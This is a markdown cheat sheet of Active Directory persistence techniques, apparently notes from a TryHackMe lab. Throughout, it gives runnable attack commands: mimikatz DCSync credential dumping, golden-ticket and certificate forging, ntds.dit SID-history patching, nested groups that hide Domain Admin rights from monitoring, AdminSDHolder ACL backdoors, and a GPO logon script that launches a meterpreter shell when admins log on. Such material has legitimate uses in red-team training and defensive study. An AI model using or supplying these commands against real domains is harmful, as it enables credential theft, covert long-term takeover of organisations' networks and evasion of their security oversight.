# Active Directory Persistance


## Using Credentials

* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest 
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
    * Credentials for multiple local administrators
    * Service account with delegation permissions
    * __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)

### Usage

* Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```

## Using Tickets

* __Golden Ticket__ crafted TGT, 
    * Needs domain name, domain SID and a user ID to impersonate
    * Needs krbtgt NTLM to sign the ticket
    * krbtgt hash never rotates automatically, only refreshed manually
    * krbtgt hash bypasses smart cards
    * TGT can not be older than 20 minutes
    * TGT lifetime can be set to years
    * TGT can be signed anywhere as long as the krbtgt hash is known

* __Silver Ticket__ crafted TGS
    * Signed by targeted service account on a host
    * DC is never contacted, no contact to any TGT or KDC
    * Non existing user can be used with a local admin group's SID

### Usage 

* Craft a golden ticket
```sh
Get-ADDomain
```
```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```

## Using Certificates

* Private key extraction via mimikatz which makes it exportable
```sh
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
```
* Password of the certificate is `mimikatz` afterwards
* Use [ForgeCert](https://github.com/GhostPack/ForgeCert) to create certificate
```sh
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
```
*
* Use Rubeus to request the TGT via
```sh
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
```
* Load the TGT via mimikatz
```sh
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\
```

## Using SID History

* Account logs on -> associated SIDs (group SIDs) added to the user's token -> permissions are set in this way
* SIDs of controlled accounts may be added to the history
* Add Administrator group to the associated SIDs / the token
* `ntds.dit` stores all AD info
* User does not come up on checking groups, the user stays hidden unless searched for explicitly

### Usage

* Check SID history
```sh
Get-ADUser <your ad username> -properties sidhistory,memberof
```
* Check SID of domain admins
```sh
Get-ADGroup "Domain Admins"
```
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
```sh
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit 
Start-Service -Name ntds
```
* Verify users SIDs
```sh
Get-ADUser <username> -Properties sidhistory 
dir \\<dc.example.com>\C$\
```

## Using Group Memberships

* Most are monitored security wise
* Interesting group for persistence are 
    * `IT Support`
    * Local administrational accounts
    * Groups with ownership over GPO
* Nested groups are used to organize an AD
    * `Helpdesk`, `Network Manager` is a nested group of `IT Support`
* Joining a nested groups is not as alerting as joining a more general group

### Usage

* Create a new subgroup
```sh
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
```
* And nesting another one
```sh
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security 

Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```

* Do it a couple of times again and add the last group to Domain Admins
```sh
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_2"
```

* Add the low priv user to the first group
```sh
Add-ADGroupMember -Identity "<username>_steam_networks1" -Members "<low privileged username>"
```

* And check
```sh
dir \\<domain>\c$\
```
* Verify nested  group
```sh
Get-ADGroupMember -Identity "Domain Admins"
```

## Using ACLs

* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
    * Domain Admins
    * Administrators 
    * Enterprise/Schema Administrator
* SDProp as a process maps the ACLs to protected groups every hour

## Usage

* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add Snap-In -> Active Directory Users and Groups
* View -> Advanced Features
* AdminSDHolder group in Domain -> System
* Right click the group -> Properties -> Security -> Add user and Check Names -> OK -> Allow on Full Control -> Apply -> OK

* Add the user to other groups with the new propagated permissions

## Using GPOs

* Restricted Group Memberships, admin access to every host in the domain
* Logon Script Deployment, get a shell when a user logs in

### Usage

* Craft a portable executable shell via meterpreter
* Craft a batch script
```sh
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe && timeout /t 20 && C:\windows\tmp\shell.exe
```
* Copy both to the sysvol
* `runas /netonly /user:Administrator cmd.exe` and therein open `mmc`
* File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
* Right click Admins OU -> Create GPO in the domain -> link it -> name it
* Right click created policy -> Enforced
* Right click created policy -> edit -> User Configuration / Policies -> Window Settings -> Scripts (logon/logoff)
* Right click Logon -> Properties -> Scripts tab -> Add -> Browse
* Select the previously created batch script and PE
* Catch the shell when an admin logs on

* Once again open mmc 
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
* Click on every other group except Authenticated Users and remove them

* Add -> `Domain Computers` -> check names - OK
* Read Permissions -> OK -> Authenticated Users -> Remove